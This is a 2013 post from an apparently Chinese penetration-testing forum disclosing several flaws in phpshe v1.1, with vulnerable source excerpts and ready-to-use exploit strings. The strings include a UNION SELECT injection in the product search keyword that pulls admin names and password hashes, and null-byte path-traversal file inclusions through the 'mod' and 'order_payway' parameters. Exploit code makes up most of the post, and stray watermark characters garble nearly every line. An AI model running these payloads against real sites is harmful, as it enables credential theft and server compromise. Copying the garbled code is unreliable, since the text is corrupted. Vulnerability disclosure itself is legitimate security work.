找回密码
 立即注册
中国网络渗透测试联盟»论坛 --==渗透测试区{ Penetration testing area }==-- web app渗透测试::『Web App penetration testing』 phpshe v1.1多处SQL注入和文件包含漏洞Getshell
返回列表 发新帖
查看: 2859|回复: 0
打印 上一主题 下一主题

phpshe v1.1多处SQL注入和文件包含漏洞Getshell

[复制链接]
admin
跳转到指定楼层
楼主
发表于 2013-4-19 19:01:54 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
/*******************************************************/
9 Z+ U. v, ]/ F3 H0 L/* Phpshe v1.1 Vulnerability
( h$ Z8 u4 {# M& J/* ========================$ \4 j' v) a, Y! ^  d+ H6 |( @
/* By: : Kn1f3
9 \; r2 f! y+ y$ u5 b/* E-Mail : 681796@qq.com- z$ E0 J& ]' s& L0 O3 X! M
/*******************************************************/- P1 m9 ^$ f. P5 P$ h' L
0×00 整体大概参数传输% Q' L2 y# y$ _4 b$ x- t2 F( N
: H, D4 l3 `2 A! s% ~. a' F

$ @2 M$ F; i( v4 u- w' F: s; s
; b; m+ s6 T4 P; q/ Y. |//common.php+ }% ^/ @# `! [% h
if (get_magic_quotes_gpc()) {
7 J' J! {6 ~; ?!empty($_GET) && extract(pe_trim(pe_stripslashes($_GET)), EXTR_PREFIX_ALL, '_g');
2 Q0 r0 {. p7 _& T' m" i!empty($_POST) && extract(pe_trim(pe_stripslashes($_POST)), EXTR_PREFIX_ALL, '_p');% X2 A8 \. O# f! W7 W9 D$ W
}3 e8 t: u7 \7 q# w. s" q6 }$ ?0 r2 m0 ?
else {
' D" D3 B- q: I' U/ [' Q!empty($_GET) && extract(pe_trim($_GET),EXTR_PREFIX_ALL,'_g');  ^; A& @% e0 S0 h) |+ z4 n* M
!empty($_POST) && extract(pe_trim($_POST),EXTR_PREFIX_ALL,'_p');6 b! X0 X: |; O) X/ t/ ]7 M# C2 E# g
}, b3 H9 R# I7 N
session_start();
) _. O# l- A3 m!empty($_SESSION) && extract(pe_trim($_SESSION),EXTR_PREFIX_ALL,'_s');$ ?' C% x  U) o. n) v6 W) H
!empty($_COOKIE) && extract(pe_trim(pe_stripslashes($_COOKIE)),EXTR_PREFIX_ALL,'_c');# [2 c; s! z, G1 |2 B

7 K% z& D" l2 I+ |, L0×01 包含漏洞
$ l9 v4 q1 K* m' P; s! x
1 `( O! k4 z" ]6 j  g* G7 C
9 V, m5 d- J' ], v//首页文件
5 ^. E$ A! V5 \+ r/ M# o<!--?php include('common.php'); $cache_category = cache::get('category'); $cache_category_arr = cache::get('category_arr'); $cache_class = cache::get('class'); $cache_ad = cache::get('ad'); $cache_link = cache::get('link'); $cache_page = cache::get('page'); $web_qq = $cache_setting['web_qq']['setting_value'] ? explode(',', $cache_setting['web_qq']['setting_value']) : array(); $cart_num = pe_login('user') ? $db--->pe_num('cart', array('user_id'=>$_s_user_id)) : (unserialize($_c_cart_list) ? count(unserialize($_c_cart_list)) : 0);4 ~! b( m/ ?( |! k) C
include("{$pe['path_root']}module/{$module}/{$mod}.php");  //$mod可控造成“鸡肋”包含漏洞
" j: y+ l. x/ Lpe_result();) D0 L2 H6 b, U$ g9 E' Y
?>' G% }% f$ _) u
//common 文件 第15行开始+ f) o4 C& n3 {2 K+ n3 C
url路由配置6 C8 v/ ?- q7 }. @9 Q0 J0 U( R  w7 f
$module = $mod = $act = 'index';
! v: D* o0 u  o$mod = $_POST['mod'] ? $_POST['mod'] : ($_GET['mod'] ? $_GET['mod'] : $mod);
2 T7 u4 t. l% Q  X, y+ _4 e$act = $_POST['act'] ? $_POST['act'] : ($_GET['act'] ? $_GET['act'] : $act);$ d, }+ o0 \$ [# F1 j* I% g/ e
$id = $_POST['id'] ? $_POST['id'] : ($_GET['id'] ? $_GET['id'] : $id);
1 Z% a* M$ ~) @/ y1 D6 D//exp:http://127.0.0.1/phpshe_v1.1/index.php?mod=../../robots.txt%005 w, p* k) }7 ?" `. \( l


6 a0 e" C" d; T( S0 k 4 P$ V0 S5 B) ]# ?- c: _, B; L
0×02 搜索注入
0 m4 w2 I/ C: F* [0 g ( x, G9 r: e$ ^* m- E( P/ @  P9 |% _
<code id="code2">

//product.php文件
* x# C- i" U/ d4 q0 m( `# Qcase 'list':
5 O/ j( U* i7 q5 o: a8 j$category_id = intval($id);
5 r( g; ]  |) D. Y$info = $db->pe_select('category', array('category_id'=>$category_id));
/ w* Q: v3 |3 l+ v//搜索5 r7 a+ p5 e4 O. Z4 e5 r. ^
$sqlwhere = " and `product_state` = 1";9 X6 l: o/ \- S2 q; Y
pe_lead('hook/category.hook.php');
( r$ ?! i) @- t' G. J. Yif ($category_id) {
! B+ @. Z, X( r( U4 C8 f2 ?where .= is_array($category_cidarr = category_cidarr($category_id)) ? " and `category_id` in('".implode("','", $category_cidarr)."')" : " and `category_id` = '{$category_id}'";, D, j. t5 K0 z8 a8 R! B
}
' l) ?2 c5 Q# ?' |$_g_keyword && $sqlwhere .= " and `product_name` like '%{$_g_keyword}%'"; //keyword变量未进行有效的sql语句过滤5 L9 ]; x: s) e, g6 p( n& L
if ($_g_orderby) {" \4 H  m; p4 ]3 Y
$orderby = explode('_', $_g_orderby);
1 L8 M" Y% j% {! h' {$sqlwhere .= " order by `product_{$orderby[0]}` {$orderby[1]}";/ W2 O+ x1 M( I# q' p' f& e- ~: S
}
0 n& Z- ]& Z( P% r2 E, eelse {) a, t9 y3 L# I/ Y
$sqlwhere .= " order by `product_id` desc";
* t0 I# ]% p$ j- I0 ?}/ Y0 S3 F: A3 q- q
$info_list = $db->pe_selectall('product', $sqlwhere, '*', array(16, $_g_page));% `$ D! ^' G0 Y1 J: v
//热卖排行9 C1 X8 F  r) b9 [$ g& ?5 R. v7 Q5 U# m
$product_hotlist = product_hotlist();' N/ W7 `; z# P; @
//当前路径# w9 U+ @) ]7 i  T
$nowpath = category_path($category_id);) m' K7 j8 G0 v* G( }
$seo = pe_seo($info['category_name']);9 b9 o$ I/ A. E- ^
include(pe_tpl('product_list.html'));! N+ W; \' o! F: Q) z
//跟进selectall函数库0 B9 s9 X6 N5 j* I
public function pe_selectall($table, $where = '', $field = '*', $limit_page = array()): d8 N# x% Z$ w6 e* b7 O
{
+ e; J. c* s3 g* O$ I//处理条件语句$ @  v9 H! F9 @
$sqlwhere = $this->_dowhere($where);* w& t/ w9 Y% \3 `, `
return $this->sql_selectall("select {$field} from `".dbpre."{$table}` {$sqlwhere}", $limit_page);& O% N0 @- l3 R0 b5 ]3 `
}
1 {% Q* x: ?8 @1 z4 W- J# K- ^/ N//exp- ]% t; f' z) l; V& K, y6 g
product/list?keyword=kn1f3'+union+select+1,2,3,4,5,(select+concat(admin_name,0x27,admin_pw,0x27)+from+pe_admin),7,8,9,10,11,12,13,14,15,16,17,18,19 and+'1'='1
2 a4 b' k& ^# `, j& h' X

</code>+ {6 D) l7 o# V1 H: @

, v5 ~( l4 t$ T" e+ l0×03 包含漏洞2) K$ [% s  q2 q

( V' Q5 s. O( i- V% i/ B<code id="code3">

//order.php

case 'pay':


3 p4 w/ T# h9 s, K2 A$ I" z$order_id = pe_dbhold($_g_id);


! N  W& T% J2 B% G/ a) R4 l$cache_payway = cache::get('payway');


, |6 u. C- M# S0 H. \/ {0 W/ cforeach($cache_payway as $k => $v) {


+ @8 L/ V" r0 s) z$cache_payway[$k]['payway_config'] = unserialize($cache_payway[$k]['payway_config']);


2 ?) c' |4 t  v3 fif ($k == 'bank') {

8 e; c) x' f0 D' n: t
$cache_payway[$k]['payway_config']['bank_text'] = str_replace(array("\r", "\n", "\t"), '\n', $cache_payway[$k]['payway_config']['bank_text']);

1 d7 M! z+ `/ q: a+ D% u6 l& Q
}

: ~- u- F$ v% [9 m1 S6 P# K8 @$ z
}

" c! i, t- \* R; G! o
$order = $db->pe_select('order', array('order_id'=>$order_id, 'order_state'=>'notpay'));

/ V# [4 q) ?- Y. e( L
!$order['order_id'] && pe_error('订单号错误...');

$ W; B" H+ P6 R2 b: A7 n
if (isset($_p_pesubmit)) {


3 X4 s8 b) D0 {if ($db->pe_update('order', array('order_id'=>$order_id), $_p_info)) {


4 X, z. y, X3 B9 B. M4 D& b$info_list = $db->pe_selectall('orderdata', array('order_id'=>$order_id));

4 M1 r6 F+ n( w( D+ L
foreach ($info_list as $v) {


5 g5 g- Q; v# e- p! ]* Q* @/ ]$order['order_name'] .= "{$v['product_name']};";; S9 o2 w4 R+ @+ A2 N* J: v

' u; @2 L. x* z
}


( f# F, t9 D5 A. c/ a) H0 |7 Y9 Vecho '正在为您连接支付网站,请稍后...';


( c) v# m* r5 G& V: {include("{$pe['path_root']}include/plugin/payway/{$_p_info['order_payway']}/order_pay.php");


$ c6 B$ J0 D6 O) p  p3 b5 K5 n1 X}//当一切准备好的时候就可以进行"鸡肋包含了"

1 |* z/ U/ n/ J  t3 R( v$ h
else {


6 P" Z8 Z& v$ b* q- Q& S  Zpe_error('支付错误...');

3 f; p$ Z( ~# R5 u- m8 g9 w
}

: C; g$ A6 X- l  L2 x, X2 e
}

) A. L; V0 h; [5 l/ ?9 q  s' K
$seo = pe_seo('选择支付方式');


' @( s- p, g9 R: A. Tinclude(pe_tpl('order_pay.html'));

# P; Y# y5 K7 u5 z
break;

}

//exp:

//http://127.0.0.1/phpshe_v1.1/index.php?mod=order&act=pay&id=1304070001

//info%5Border_payway%5D=alipay/../../../1.txt%00&pesubmit=%E7%AB%8B%E5%8D%B3%E6%94%AF%E4%BB%98</code>
$ u$ \& j6 w+ M! c+ n; S

回复

使用道具 举报

返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

Copyright © 2001-2013 Comsenz. All Rights Reserved - Powered by Discuz! X3.2
快速回复 返回顶部 返回列表